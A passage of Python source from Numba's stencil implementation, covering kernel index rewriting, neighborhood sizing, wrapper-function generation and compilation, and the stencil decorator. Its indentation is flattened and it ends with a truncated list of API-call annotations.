if stmt_index_var.name in tuple_table:
kernel_consts += [tuple_table[stmt_index_var.name]]
elif stmt_index_var.name in const_dict:
kernel_consts += [const_dict[stmt_index_var.name]]
else:
raise NumbaValueError("stencil kernel index is not "
"constant, 'neighborhood' option required")
if ndim == 1:
# Single dimension always has index variable 'index0'.
# tmpvar will hold the real index and is computed by
# adding the relative offset in stmt.value.index to
# the current absolute location in index0.
index_var = ir.Var(scope, index_names[0], loc)
tmpname = ir_utils.mk_unique_var("stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
stmt_index_var_typ = typemap[stmt_index_var.name]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(stmt_index_var_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [stmt_index_var, index_var], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [stmt_index_var_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
acc_call = ir.Expr.binop(operator.add, stmt_index_var,
index_var, loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
index_vars = []
sum_results = []
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
const_index_vars = []
ind_stencils = []
stmt_index_var_typ = typemap[stmt_index_var.name]
# Same idea as above but you have to extract
# individual elements out of the tuple indexing
# expression and add the corresponding index variable
# to them and then reconstitute as a tuple that can
# index the array.
for dim in range(ndim):
tmpname = ir_utils.mk_unique_var("const_index")
tmpvar = ir.Var(scope, tmpname, loc)
new_body.append(ir.Assign(ir.Const(dim, loc),
tmpvar, loc))
const_index_vars += [tmpvar]
index_var = ir.Var(scope, index_names[dim], loc)
index_vars += [index_var]
tmpname = ir_utils.mk_unique_var("ind_stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
ind_stencils += [tmpvar]
getitemname = ir_utils.mk_unique_var("getitem")
getitemvar = ir.Var(scope, getitemname, loc)
getitemcall = ir.Expr.getitem(stmt_index_var,
const_index_vars[dim], loc)
new_body.append(ir.Assign(getitemcall, getitemvar, loc))
# Get the type of this particular part of the index tuple.
if isinstance(stmt_index_var_typ, types.ConstSized):
one_index_typ = stmt_index_var_typ[dim]
else:
one_index_typ = stmt_index_var_typ[:]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(one_index_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [getitemvar, index_vars[dim]], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [one_index_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
else:
acc_call = ir.Expr.binop(operator.add, getitemvar,
index_vars[dim], loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
tuple_call = ir.Expr.build_tuple(ind_stencils, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value,s_index_var,loc),
stmt.target,loc))
else:
new_body.append(stmt)
block.body = new_body
if need_to_calc_kernel:
# Find the size of the kernel by finding the maximum absolute value
# index used in the kernel specification.
neighborhood = [[0,0] for _ in range(ndim)]
if len(kernel_consts) == 0:
raise NumbaValueError("Stencil kernel with no accesses to "
"relatively indexed arrays.")
for index in kernel_consts:
if isinstance(index, tuple) or isinstance(index, list):
for i in range(len(index)):
te = index[i]
if isinstance(te, ir.Var) and te.name in const_dict:
te = const_dict[te.name]
if isinstance(te, int):
neighborhood[i][0] = min(neighborhood[i][0], te)
neighborhood[i][1] = max(neighborhood[i][1], te)
else:
raise NumbaValueError(
"stencil kernel index is not constant,"
"'neighborhood' option required")
index_len = len(index)
elif isinstance(index, int):
neighborhood[0][0] = min(neighborhood[0][0], index)
neighborhood[0][1] = max(neighborhood[0][1], index)
index_len = 1
else:
raise NumbaValueError(
"Non-tuple or non-integer used as stencil index.")
if index_len != ndim:
raise NumbaValueError(
"Stencil index does not match array dimensionality.")
return (neighborhood, relatively_indexed)
def get_return_type(self, argtys):
if config.DEBUG_ARRAY_OPT >= 1:
print("get_return_type", argtys)
ir_utils.dump_blocks(self.kernel_ir.blocks)
if not isinstance(argtys[0], types.npytypes.Array):
raise NumbaValueError("The first argument to a stencil kernel must "
"be the primary input array.")
from numba.core import typed_passes
typemap, return_type, calltypes, _ = typed_passes.type_inference_stage(
self._typingctx,
self._targetctx,
self.kernel_ir,
argtys,
None,
{})
if isinstance(return_type, types.npytypes.Array):
raise NumbaValueError(
"Stencil kernel must return a scalar and not a numpy array.")
real_ret = types.npytypes.Array(return_type, argtys[0].ndim,
argtys[0].layout)
return (real_ret, typemap, calltypes)
def _install_type(self, typingctx):
"""Constructs and installs a typing class for a StencilFunc object in
the input typing context.
"""
_ty_cls = type('StencilFuncTyping_' +
str(self.id),
(AbstractTemplate,),
dict(key=self, generic=self._type_me))
typingctx.insert_user_function(self, _ty_cls)
def compile_for_argtys(self, argtys, kwtys, return_type, sigret):
# look in the type cache to find if result array is passed
(_, result, typemap, calltypes) = self._type_cache[argtys]
new_func = self._stencil_wrapper(result, sigret, return_type,
typemap, calltypes, *argtys)
return new_func
def _type_me(self, argtys, kwtys):
"""
Implement AbstractTemplate.generic() for the typing class
built by StencilFunc._install_type().
Return the call-site signature.
"""
if (self.neighborhood is not None and
len(self.neighborhood) != argtys[0].ndim):
raise NumbaValueError("%d dimensional neighborhood specified "
"for %d dimensional input array" %
(len(self.neighborhood), argtys[0].ndim))
argtys_extra = argtys
sig_extra = ""
result = None
if 'out' in kwtys:
argtys_extra += (kwtys['out'],)
sig_extra += ", out=None"
result = kwtys['out']
if 'neighborhood' in kwtys:
argtys_extra += (kwtys['neighborhood'],)
sig_extra += ", neighborhood=None"
# look in the type cache first
if argtys_extra in self._type_cache:
(_sig, _, _, _) = self._type_cache[argtys_extra]
return _sig
(real_ret, typemap, calltypes) = self.get_return_type(argtys)
sig = signature(real_ret, *argtys_extra)
dummy_text = ("def __numba_dummy_stencil({}{}):\n pass\n".format(
",".join(self.kernel_ir.arg_names), sig_extra))
exec(dummy_text) in globals(), locals()
dummy_func = eval("__numba_dummy_stencil")
sig = sig.replace(pysig=utils.pysignature(dummy_func))
self._targetctx.insert_func_defn([(self._lower_me, self, argtys_extra)])
self._type_cache[argtys_extra] = (sig, result, typemap, calltypes)
return sig
def copy_ir_with_calltypes(self, ir, calltypes):
"""
Create a copy of a given IR along with its calltype information.
We need a copy of the calltypes because copy propagation applied
to the copied IR will change the calltypes and make subsequent
uses of the original IR invalid.
"""
copy_calltypes = {}
kernel_copy = ir.copy()
kernel_copy.blocks = {}
# For each block...
for (block_label, block) in ir.blocks.items():
new_block = copy.deepcopy(ir.blocks[block_label])
new_block.body = []
# For each statement in each block...
for stmt in ir.blocks[block_label].body:
# Copy the statement to the new copy of the kernel
# and if the original statement is in the original
# calltypes then add the type associated with this
# statement to the calltypes copy.
scopy = copy.deepcopy(stmt)
new_block.body.append(scopy)
if stmt in calltypes:
copy_calltypes[scopy] = calltypes[stmt]
kernel_copy.blocks[block_label] = new_block
return (kernel_copy, copy_calltypes)
def _stencil_wrapper(self, result, sigret, return_type, typemap, calltypes, *args):
# Overall approach:
# 1) Construct a string containing a function definition for the stencil function
# that will execute the stencil kernel. This function definition includes a
# unique stencil function name, the parameters to the stencil kernel, loop
# nests across the dimensions of the input array. Those loop nests use the
# computed stencil kernel size so as not to try to compute elements where
# elements outside the bounds of the input array would be needed.
        # 2) The body of the loop nest in this new function is a special sentinel
# assignment.
# 3) Get the IR of this new function.
# 4) Split the block containing the sentinel assignment and remove the sentinel
# assignment. Insert the stencil kernel IR into the stencil function IR
# after label and variable renaming of the stencil kernel IR to prevent
# conflicts with the stencil function IR.
# 5) Compile the combined stencil function IR + stencil kernel IR into existence.
# Copy the kernel so that our changes for this callsite
        # won't affect other callsites.
(kernel_copy, copy_calltypes) = self.copy_ir_with_calltypes(
self.kernel_ir, calltypes)
# The stencil kernel body becomes the body of a loop, for which args aren't needed.
ir_utils.remove_args(kernel_copy.blocks)
first_arg = kernel_copy.arg_names[0]
in_cps, out_cps = ir_utils.copy_propagate(kernel_copy.blocks, typemap)
name_var_table = ir_utils.get_name_var_table(kernel_copy.blocks)
ir_utils.apply_copy_propagate(
kernel_copy.blocks,
in_cps,
name_var_table,
typemap,
copy_calltypes)
if "out" in name_var_table:
raise NumbaValueError("Cannot use the reserved word 'out' in stencil kernels.")
sentinel_name = ir_utils.get_unused_var_name("__sentinel__", name_var_table)
if config.DEBUG_ARRAY_OPT >= 1:
print("name_var_table", name_var_table, sentinel_name)
the_array = args[0]
if config.DEBUG_ARRAY_OPT >= 1:
print("_stencil_wrapper", return_type, return_type.dtype,
type(return_type.dtype), args)
ir_utils.dump_blocks(kernel_copy.blocks)
# We generate a Numba function to execute this stencil and here
# create the unique name of this function.
stencil_func_name = "__numba_stencil_%s_%s" % (
hex(id(the_array)).replace("-", "_"),
self.id)
# We will put a loop nest in the generated function for each
# dimension in the input array. Here we create the name for
# the index variable for each dimension. index0, index1, ...
index_vars = []
for i in range(the_array.ndim):
index_var_name = ir_utils.get_unused_var_name("index" + str(i),
name_var_table)
index_vars += [index_var_name]
# Create extra signature for out and neighborhood.
out_name = ir_utils.get_unused_var_name("out", name_var_table)
neighborhood_name = ir_utils.get_unused_var_name("neighborhood",
name_var_table)
sig_extra = ""
if result is not None:
sig_extra += ", {}=None".format(out_name)
if "neighborhood" in dict(self.kws):
sig_extra += ", {}=None".format(neighborhood_name)
# Get a list of the standard indexed array names.
standard_indexed = self.options.get("standard_indexing", [])
if first_arg in standard_indexed:
raise NumbaValueError("The first argument to a stencil kernel must "
"use relative indexing, not standard indexing.")
if len(set(standard_indexed) - set(kernel_copy.arg_names)) != 0:
raise NumbaValueError("Standard indexing requested for an array name "
"not present in the stencil kernel definition.")
# Add index variables to getitems in the IR to transition the accesses
# in the kernel from relative to regular Python indexing. Returns the
# computed size of the stencil kernel and a list of the relatively indexed
# arrays.
kernel_size, relatively_indexed = self.add_indices_to_kernel(
kernel_copy, index_vars, the_array.ndim,
self.neighborhood, standard_indexed, typemap, copy_calltypes)
if self.neighborhood is None:
self.neighborhood = kernel_size
if config.DEBUG_ARRAY_OPT >= 1:
print("After add_indices_to_kernel")
ir_utils.dump_blocks(kernel_copy.blocks)
# The return in the stencil kernel becomes a setitem for that
# particular point in the iteration space.
ret_blocks = self.replace_return_with_setitem(kernel_copy.blocks,
index_vars, out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("After replace_return_with_setitem", ret_blocks)
ir_utils.dump_blocks(kernel_copy.blocks)
# Start to form the new function to execute the stencil kernel.
func_text = "def {}({}{}):\n".format(stencil_func_name,
",".join(kernel_copy.arg_names), sig_extra)
# Get loop ranges for each dimension, which could be either int
# or variable. In the latter case we'll use the extra neighborhood
# argument to the function.
ranges = []
for i in range(the_array.ndim):
if isinstance(kernel_size[i][0], int):
lo = kernel_size[i][0]
hi = kernel_size[i][1]
else:
lo = "{}[{}][0]".format(neighborhood_name, i)
hi = "{}[{}][1]".format(neighborhood_name, i)
ranges.append((lo, hi))
# If there are more than one relatively indexed arrays, add a call to
# a function that will raise an error if any of the relatively indexed
# arrays are of different size than the first input array.
if len(relatively_indexed) > 1:
func_text += " raise_if_incompatible_array_sizes(" + first_arg
for other_array in relatively_indexed:
if other_array != first_arg:
func_text += "," + other_array
func_text += ")\n"
# Get the shape of the first input array.
shape_name = ir_utils.get_unused_var_name("full_shape", name_var_table)
func_text += " {} = {}.shape\n".format(shape_name, first_arg)
# Converts cval to a string constant
def cval_as_str(cval):
if not np.isfinite(cval):
# See if this is a string-repr numerical const, issue #7286
if np.isnan(cval):
return "np.nan"
elif np.isinf(cval):
if cval < 0:
return "-np.inf"
else:
return "np.inf"
else:
return str(cval)
# If we have to allocate the output array (the out argument was not used)
# then us numpy.full if the user specified a cval stencil decorator option
# or np.zeros if they didn't to allocate the array.
if result is None:
return_type_name = numpy_support.as_dtype(
return_type.dtype).type.__name__
if "cval" in self.options:
cval = self.options["cval"]
if return_type.dtype != typing.typeof.typeof(cval):
msg = "cval type does not match stencil return type."
raise NumbaValueError(msg)
out_init ="{} = np.full({}, {}, dtype=np.{})\n".format(
out_name, shape_name, cval_as_str(cval),
return_type_name)
else:
out_init ="{} = np.zeros({}, dtype=np.{})\n".format(
out_name, shape_name, return_type_name)
func_text += " " + out_init
else: # result is present, if cval is set then use it
if "cval" in self.options:
cval = self.options["cval"]
cval_ty = typing.typeof.typeof(cval)
if not self._typingctx.can_convert(cval_ty, return_type.dtype):
msg = "cval type does not match stencil return type."
raise NumbaValueError(msg)
out_init = "{}[:] = {}\n".format(out_name, cval_as_str(cval))
func_text += " " + out_init
offset = 1
# Add the loop nests to the new function.
for i in range(the_array.ndim):
for j in range(offset):
func_text += " "
# ranges[i][0] is the minimum index used in the i'th dimension
# but minimum's greater than 0 don't preclude any entry in the array.
# So, take the minimum of 0 and the minimum index found in the kernel
# and this will be a negative number (potentially -0). Then, we do
# unary - on that to get the positive offset in this dimension whose
# use is precluded.
# ranges[i][1] is the maximum of 0 and the observed maximum index
# in this dimension because negative maximums would not cause us to
# preclude any entry in the array from being used.
func_text += ("for {} in range(-min(0,{}),"
"{}[{}]-max(0,{})):\n").format(
index_vars[i],
ranges[i][0],
shape_name,
i,
ranges[i][1])
offset += 1
for j in range(offset):
func_text += " "
# Put a sentinel in the code so we can locate it in the IR. We will
# remove this sentinel assignment and replace it with the IR for the
# stencil kernel body.
func_text += "{} = 0\n".format(sentinel_name)
func_text += " return {}\n".format(out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("new stencil func text")
print(func_text)
# Force the new stencil function into existence.
exec(func_text) in globals(), locals()
stencil_func = eval(stencil_func_name)
if sigret is not None:
pysig = utils.pysignature(stencil_func)
sigret.pysig = pysig
# Get the IR for the newly created stencil function.
from numba.core import compiler
stencil_ir = compiler.run_frontend(stencil_func)
ir_utils.remove_dels(stencil_ir.blocks)
# rename all variables in stencil_ir afresh
var_table = ir_utils.get_name_var_table(stencil_ir.blocks)
new_var_dict = {}
reserved_names = ([sentinel_name, out_name, neighborhood_name,
shape_name] + kernel_copy.arg_names + index_vars)
for name, var in var_table.items():
if not name in reserved_names:
new_var_dict[name] = ir_utils.mk_unique_var(name)
ir_utils.replace_var_names(stencil_ir.blocks, new_var_dict)
stencil_stub_last_label = max(stencil_ir.blocks.keys()) + 1
# Shift labels in the kernel copy so they are guaranteed unique
# and don't conflict with any labels in the stencil_ir.
kernel_copy.blocks = ir_utils.add_offset_to_labels(
kernel_copy.blocks, stencil_stub_last_label)
new_label = max(kernel_copy.blocks.keys()) + 1
# Adjust ret_blocks to account for addition of the offset.
ret_blocks = [x + stencil_stub_last_label for x in ret_blocks]
if config.DEBUG_ARRAY_OPT >= 1:
print("ret_blocks w/ offsets", ret_blocks, stencil_stub_last_label)
print("before replace sentinel stencil_ir")
ir_utils.dump_blocks(stencil_ir.blocks)
print("before replace sentinel kernel_copy")
ir_utils.dump_blocks(kernel_copy.blocks)
# Search all the block in the stencil outline for the sentinel.
for label, block in stencil_ir.blocks.items():
for i, inst in enumerate(block.body):
if (isinstance( inst, ir.Assign) and
inst.target.name == sentinel_name):
# We found the sentinel assignment.
loc = inst.loc
scope = block.scope
# split block across __sentinel__
# A new block is allocated for the statements prior to the
# sentinel but the new block maintains the current block
# label.
prev_block = ir.Block(scope, loc)
prev_block.body = block.body[:i]
# The current block is used for statements after sentinel.
block.body = block.body[i + 1:]
# But the current block gets a new label.
body_first_label = min(kernel_copy.blocks.keys())
# The previous block jumps to the minimum labelled block of
# the parfor body.
prev_block.append(ir.Jump(body_first_label, loc))
# Add all the parfor loop body blocks to the gufunc
# function's IR.
for (l, b) in kernel_copy.blocks.items():
stencil_ir.blocks[l] = b
stencil_ir.blocks[new_label] = block
stencil_ir.blocks[label] = prev_block
# Add a jump from all the blocks that previously contained
# a return in the stencil kernel to the block
# containing statements after the sentinel.
for ret_block in ret_blocks:
stencil_ir.blocks[ret_block].append(
ir.Jump(new_label, loc))
break
else:
continue
break
stencil_ir.blocks = ir_utils.rename_labels(stencil_ir.blocks)
ir_utils.remove_dels(stencil_ir.blocks)
assert(isinstance(the_array, types.Type))
array_types = args
new_stencil_param_types = list(array_types)
if config.DEBUG_ARRAY_OPT >= 1:
print("new_stencil_param_types", new_stencil_param_types)
ir_utils.dump_blocks(stencil_ir.blocks)
# Compile the combined stencil function with the replaced loop
# body in it.
ir_utils.fixup_var_define_in_scope(stencil_ir.blocks)
new_func = compiler.compile_ir(
self._typingctx,
self._targetctx,
stencil_ir,
new_stencil_param_types,
None,
compiler.DEFAULT_FLAGS,
{})
return new_func
def __call__(self, *args, **kwargs):
if (self.neighborhood is not None and
len(self.neighborhood) != args[0].ndim):
raise ValueError("{} dimensional neighborhood specified for {} "
"dimensional input array".format(
len(self.neighborhood), args[0].ndim))
if 'out' in kwargs:
result = kwargs['out']
rdtype = result.dtype
rttype = numpy_support.from_dtype(rdtype)
result_type = types.npytypes.Array(rttype, result.ndim,
numpy_support.map_layout(result))
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = tuple([typing.typeof.typeof(x) for x in args] +
[result_type])
else:
result = None
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = array_types
if config.DEBUG_ARRAY_OPT >= 1:
print("__call__", array_types, args, kwargs)
(real_ret, typemap, calltypes) = self.get_return_type(array_types)
new_func = self._stencil_wrapper(result, None, real_ret, typemap,
calltypes, *array_types_full)
if result is None:
return new_func.entry_point(*args)
else:
return new_func.entry_point(*(args+(result,)))
def stencil(func_or_mode='constant', **options):
# called on function without specifying mode style
if not isinstance(func_or_mode, str):
mode = 'constant' # default style
func = func_or_mode
else:
mode = func_or_mode
func = None
for option in options:
if option not in ["cval", "standard_indexing", "neighborhood"]:
raise ValueError("Unknown stencil option " + option)
wrapper = _stencil(mode, options)
if func is not None:
return wrapper(func)
return wrapper
def _stencil(mode, options):
if mode != 'constant':
raise ValueError("Unsupported mode style " + mode)
def decorated(func):
from numba.core import compiler
kernel_ir = compiler.run_frontend(func)
return StencilFunc(kernel_ir, mode, options)
return decorated
@lower_builtin(stencil)
def stencil_dummy_lower(context, builder, sig, args):
"lowering for dummy stencil calls"
return lir.Constant(lir.IntType(types.intp.bitwidth), 0)
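# Illustrative use of the stencil decorator defined above (added sketch, not part
# of the original module); from user code it is normally reached as
# `from numba import stencil`:
#
#     import numpy as np
#     from numba import stencil
#
#     @stencil
#     def smooth(a):
#         # relative indexing: a[0, 0] is the element currently being computed
#         return 0.25 * (a[0, 1] + a[1, 0] + a[0, -1] + a[-1, 0])
#
#     out = smooth(np.arange(25, dtype=np.float64).reshape(5, 5))
#     # `out` has the input's shape; border cells hold the constant-mode fill
#     # value (0 by default, configurable via the `cval` option).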
| [((827, 1, 827, 23), 'numba.core.imputils.lower_builtin', 'lower_builtin', ({(827, 15, 827, 22): 'stencil'}, {}), '(stencil)', False, 'from numba.core.imputils import lower_builtin\n'), ((48, 15, 48, 35), 'numba.misc.special.literal_unroll', 'literal_unroll', ({(48, 30, 48, 34): 'args'}, {}), '(args)', False, 'from numba.misc.special import literal_unroll\n'), ((155, 22, 155, 61), 'numba.core.ir_utils.get_tuple_table', 'ir_utils.get_tuple_table', ({(155, 47, 155, 60): 'kernel.blocks'}, {}), '(kernel.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((348, 45, 354, 19), 'numba.core.typed_passes.type_inference_stage', 'typed_passes.type_inference_stage', ({(349, 16, 349, 31): 'self._typingctx', (350, 16, 350, 31): 'self._targetctx', (351, 16, 351, 30): 'self.kernel_ir', (352, 16, 352, 22): 'argtys', (353, 16, 353, 20): 'None', (354, 16, 354, 18): '{}'}, {}), '(self._typingctx, self._targetctx, self.\n kernel_ir, argtys, None, {})', False, 'from numba.core import typed_passes\n'), ((359, 19, 360, 70), 'numba.core.types.npytypes.Array', 'types.npytypes.Array', ({(359, 40, 359, 51): 'return_type', (359, 53, 359, 67): 'argtys[0].ndim', (360, 53, 360, 69): 'argtys[0].layout'}, {}), '(return_type, argtys[0].ndim, argtys[0].layout)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((410, 14, 410, 48), 'numba.core.typing.templates.signature', 'signature', ({(410, 24, 410, 32): 'real_ret', (410, 34, 410, 47): '*argtys_extra'}, {}), '(real_ret, *argtys_extra)', False, 'from numba.core.typing.templates import CallableTemplate, signature, infer_global, AbstractTemplate\n'), ((428, 22, 428, 31), 'numba.core.ir.copy', 'ir.copy', ({}, {}), '()', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((431, 36, 431, 53), 'numba.core.ir.blocks.items', 'ir.blocks.items', ({}, {}), '()', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((469, 8, 469, 48), 'numba.core.ir_utils.remove_args', 'ir_utils.remove_args', ({(469, 29, 469, 47): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((472, 26, 472, 78), 'numba.core.ir_utils.copy_propagate', 'ir_utils.copy_propagate', ({(472, 50, 472, 68): 'kernel_copy.blocks', (472, 70, 472, 77): 'typemap'}, {}), '(kernel_copy.blocks, typemap)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((473, 25, 473, 72), 'numba.core.ir_utils.get_name_var_table', 'ir_utils.get_name_var_table', ({(473, 53, 473, 71): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((474, 8, 479, 27), 'numba.core.ir_utils.apply_copy_propagate', 'ir_utils.apply_copy_propagate', ({(475, 12, 475, 30): 'kernel_copy.blocks', (476, 12, 476, 18): 'in_cps', (477, 12, 477, 26): 'name_var_table', (478, 12, 478, 19): 'typemap', (479, 12, 479, 26): 'copy_calltypes'}, {}), '(kernel_copy.blocks, in_cps, name_var_table,\n typemap, copy_calltypes)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((484, 24, 484, 84), 'numba.core.ir_utils.get_unused_var_name', 'ir_utils.get_unused_var_name', ({(484, 53, 484, 67): '"""__sentinel__"""', (484, 69, 484, 83): 'name_var_table'}, {}), "('__sentinel__', name_var_table)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, 
registry\n'), ((511, 19, 511, 70), 'numba.core.ir_utils.get_unused_var_name', 'ir_utils.get_unused_var_name', ({(511, 48, 511, 53): '"""out"""', (511, 55, 511, 69): 'name_var_table'}, {}), "('out', name_var_table)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((512, 28, 513, 72), 'numba.core.ir_utils.get_unused_var_name', 'ir_utils.get_unused_var_name', ({(512, 57, 512, 71): '"""neighborhood"""', (513, 57, 513, 71): 'name_var_table'}, {}), "('neighborhood', name_var_table)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((582, 21, 582, 79), 'numba.core.ir_utils.get_unused_var_name', 'ir_utils.get_unused_var_name', ({(582, 50, 582, 62): '"""full_shape"""', (582, 64, 582, 78): 'name_var_table'}, {}), "('full_shape', name_var_table)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((670, 21, 670, 56), 'numba.core.compiler.run_frontend', 'compiler.run_frontend', ({(670, 43, 670, 55): 'stencil_func'}, {}), '(stencil_func)', False, 'from numba.core import compiler\n'), ((671, 8, 671, 47), 'numba.core.ir_utils.remove_dels', 'ir_utils.remove_dels', ({(671, 29, 671, 46): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((674, 20, 674, 66), 'numba.core.ir_utils.get_name_var_table', 'ir_utils.get_name_var_table', ({(674, 48, 674, 65): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((681, 8, 681, 67), 'numba.core.ir_utils.replace_var_names', 'ir_utils.replace_var_names', ({(681, 35, 681, 52): 'stencil_ir.blocks', (681, 54, 681, 66): 'new_var_dict'}, {}), '(stencil_ir.blocks, new_var_dict)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((687, 29, 688, 76), 'numba.core.ir_utils.add_offset_to_labels', 'ir_utils.add_offset_to_labels', ({(688, 32, 688, 50): 'kernel_copy.blocks', (688, 52, 688, 75): 'stencil_stub_last_label'}, {}), '(kernel_copy.blocks, stencil_stub_last_label)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((740, 28, 740, 69), 'numba.core.ir_utils.rename_labels', 'ir_utils.rename_labels', ({(740, 51, 740, 68): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((741, 8, 741, 47), 'numba.core.ir_utils.remove_dels', 'ir_utils.remove_dels', ({(741, 29, 741, 46): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((754, 8, 754, 61), 'numba.core.ir_utils.fixup_var_define_in_scope', 'ir_utils.fixup_var_define_in_scope', ({(754, 43, 754, 60): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((755, 19, 762, 15), 'numba.core.compiler.compile_ir', 'compiler.compile_ir', ({(756, 12, 756, 27): 'self._typingctx', (757, 12, 757, 27): 'self._targetctx', (758, 12, 758, 22): 'stencil_ir', (759, 12, 759, 35): 'new_stencil_param_types', (760, 12, 760, 16): 'None', (761, 12, 761, 34): 'compiler.DEFAULT_FLAGS', (762, 12, 762, 14): '{}'}, {}), '(self._typingctx, self._targetctx, stencil_ir,\n new_stencil_param_types, None, compiler.DEFAULT_FLAGS, {})', False, 'from numba.core import compiler\n'), ((822, 20, 822, 47), 'numba.core.compiler.run_frontend', 
'compiler.run_frontend', ({(822, 42, 822, 46): 'func'}, {}), '(func)', False, 'from numba.core import compiler\n'), ((830, 24, 830, 56), 'llvmlite.ir.IntType', 'lir.IntType', ({(830, 36, 830, 55): 'types.intp.bitwidth'}, {}), '(types.intp.bitwidth)', True, 'from llvmlite import ir as lir\n'), ((145, 12, 145, 47), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(145, 33, 145, 46): 'kernel.blocks'}, {}), '(kernel.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((341, 12, 341, 55), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(341, 33, 341, 54): 'self.kernel_ir.blocks'}, {}), '(self.kernel_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((344, 18, 345, 64), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(344, 34, 345, 63): '"""The first argument to a stencil kernel must be the primary input array."""'}, {}), "(\n 'The first argument to a stencil kernel must be the primary input array.')", False, 'from numba.core.errors import NumbaValueError\n'), ((356, 18, 357, 77), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(357, 16, 357, 76): '"""Stencil kernel must return a scalar and not a numpy array."""'}, {}), "('Stencil kernel must return a scalar and not a numpy array.')", False, 'from numba.core.errors import NumbaValueError\n'), ((432, 24, 432, 61), 'copy.deepcopy', 'copy.deepcopy', ({(432, 38, 432, 60): 'ir.blocks[block_label]'}, {}), '(ir.blocks[block_label])', False, 'import copy\n'), ((482, 18, 482, 91), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(482, 34, 482, 90): '"""Cannot use the reserved word \'out\' in stencil kernels."""'}, {}), '("Cannot use the reserved word \'out\' in stencil kernels.")', False, 'from numba.core.errors import NumbaValueError\n'), ((493, 12, 493, 52), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(493, 33, 493, 51): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((524, 18, 525, 82), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(524, 34, 525, 81): '"""The first argument to a stencil kernel must use relative indexing, not standard indexing."""'}, {}), "(\n 'The first argument to a stencil kernel must use relative indexing, not standard indexing.'\n )", False, 'from numba.core.errors import NumbaValueError\n'), ((528, 18, 529, 82), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(528, 34, 529, 81): '"""Standard indexing requested for an array name not present in the stencil kernel definition."""'}, {}), "(\n 'Standard indexing requested for an array name not present in the stencil kernel definition.'\n )", False, 'from numba.core.errors import NumbaValueError\n'), ((543, 12, 543, 52), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(543, 33, 543, 